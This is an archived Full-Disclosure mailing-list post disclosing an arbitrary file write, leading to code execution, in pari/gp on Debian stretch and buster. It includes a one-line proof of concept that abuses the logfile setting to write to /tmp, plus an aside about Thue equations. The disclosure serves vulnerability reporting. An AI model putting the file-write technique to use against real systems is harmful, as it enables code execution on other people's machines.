lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAGUWgD96pYn+utXY_7v3CogGyCQu6yEpe44sOtxfkS9QsVWUxA@mail.gmail.com> Date: Tue, 26 Nov 2019 12:39:14 +0200 From: Georgi Guninski <gguninski@...il.com> To: fulldisclosure@...lists.org Subject: [FD] pari/gp on debian stable allow arbitrary file write pari/gp on debian stable allow arbitrary file write pari/gp is CAS (computer algebra system). pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster allow arbitrary file write and hence arbitrary code execution. poc: ======== \\ a.gp \\ to run: \r a.gp default("logfile","/tmp/a.txt");default("log",1);print("log(1)"); ======== Of mathematical interest is pari was missing solutions to Thue equations when assuming GRH (the fix changed polynomial bound to exponential bound): http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html t=thue(thueinit(x^3+92*x+1,0),3^3);t -- CV: https://j.ludost.net/resumegg.pdf site: http://www.guninski.com blog: https://j.ludost.net/blog _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists